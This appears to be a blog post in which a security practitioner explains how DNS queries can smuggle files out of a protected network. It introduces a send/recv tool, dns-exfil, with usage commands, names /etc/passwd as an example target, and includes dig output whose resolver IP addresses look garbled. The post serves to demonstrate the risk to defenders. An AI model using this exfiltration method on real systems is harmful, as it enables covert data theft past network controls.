Once upon a time, a government auditor insisted to me that keystroke loggers had to run as root, otherwise they would not function properly. So, I wrote a keystroke logger that ran as a normal user and showed it to him.
He wasn’t amused. He said that I was violating government IT policy by demonstrating the program to him.
Some time later, another auditor was adamant that I would not be able to copy files from his secure enclave computers onto the Internet. He said that he had strong network security measures in place. So, I wrote another small program to copy files from his enclave computers onto the Internet.
He wasn’t amused either, but was far more appreciative when I showed him how it worked.
While I no longer publish the keystroke logger source code, I do publish the dns-exfil source code.
Why use the DNS to exfiltrate files
Because many security professionals do not understand how the DNS works and fail to consider the DNS as a mechanism to exfiltrate data.
The DNS is also mature, very reliable and relatively fast.
How the DNS works
There are basically two types of DNS servers.
- Recursive - 126.96.36.199, 188.8.131.52
- Authoritative - ns1.google.com, a.ns.facebook.com
Recursive DNS servers sit close to end-users. They are typically controlled by the local network administrators, ISPs or by large, distributed providers such as Google or Cloudflare. They answer DNS queries from client computers, phones and tablets in a timely fashion. That is their sole purpose in this world. This allow users to get to websites quickly.
Recursive DNS servers, normally, cache answers so that when a client asks for a common website, the answer will be fast as it will be served from the cache (if the record’s TTL has not expired).
What happens when the recursive resolver doesn’t have the answer cached? Then, it does a lookup to find the authoritative DNS server(s) for the zone and asks one of them. “Hey, Where is xyz.example.com at?"
Authoritative DNS servers are controlled by people/orgs on the Internet and, as the name implies, they are authoritative for the domain/zone in question. When a recursive resolver does not have the answer, it gets it from an authoritative DNS server. Anyone who has a domain name has Authoritative DNS servers.
How to find authoritative DNS servers
The first field of the SOA record is the primary authoritative DNS server for the domain.
$ dig +short SOA facebook.com
a.ns.facebook.com. dns.facebook.com. 1617231193 14400 1800 604800 300
$ dig +short SOA google.com
ns1.google.com. dns-admin.google.com. 365995851 900 900 1800 60
You can replace SOA with NS to see more authoritative servers than what is listed in the SOA record. Organizations typically have two or more.
$ dig NS +short example.com
How can the DNS be used to exfiltrate data
$ dig A xyz.example.com
; <<>> DiG 9.11.5-P4-5.1+deb10u3-Debian <<>> A xyz.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39455
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;xyz.example.com. IN A
;; AUTHORITY SECTION:
example.com. 3177 IN SOA ns.icann.org. noc.dns.icann.org. 2021022314 7200 3600 1209600 3600
;; Query time: 0 msec
;; SERVER: 184.108.40.206#53(220.127.116.11)
;; WHEN: Wed Mar 31 23:43:27 UTC 2021
;; MSG SIZE rcvd: 100
Using the above dig of xyz.example.com, we can see that the client computer (on some corporate network) just sent the data xyz to a DNS server somewhere on the Internet that is authoritative for the zone example.com.
What if xyz was a small part of some file on the client computer (say /etc/passwd)? What if lots of DNS queries were sent with file markers and indexes? Enough DNS queries to reorder and reassemble the entire file?
That’s how dns-exfil works (in a nutshell).
dns-exfil is actually two programs.
- send - runs on a client computer, breaking up files and sending them to the DNS server disguised as actual DNS queries.
- recv - runs on the DNS server reassembling the files from the DNS query log.
Sending a file
When demonstrating dns-exfil, I check the file’s MD5 sum before sending so I can compare to the reassembled file on the DNS server later.
$ md5sum ../test-files/gpl-3.0.txt
$ send -file ../test-files/gpl-3.0.txt -marker howdy &> /dev/null
Receiving a file
The reassembled file has the same MD5 sum as the original file on the client.
$ recv -qlog logs/coredns.log -marker howdy > file.txt
$ md5sum file.txt
- When I initially wrote dns-exfil, I used BIND for the DNS server. However, any authoritative DNS server will do. Today, I use coredns as it’s easier to setup and more secure.
- The picture at the top is a baby lizard from our garden. He’s climbing up a water hose.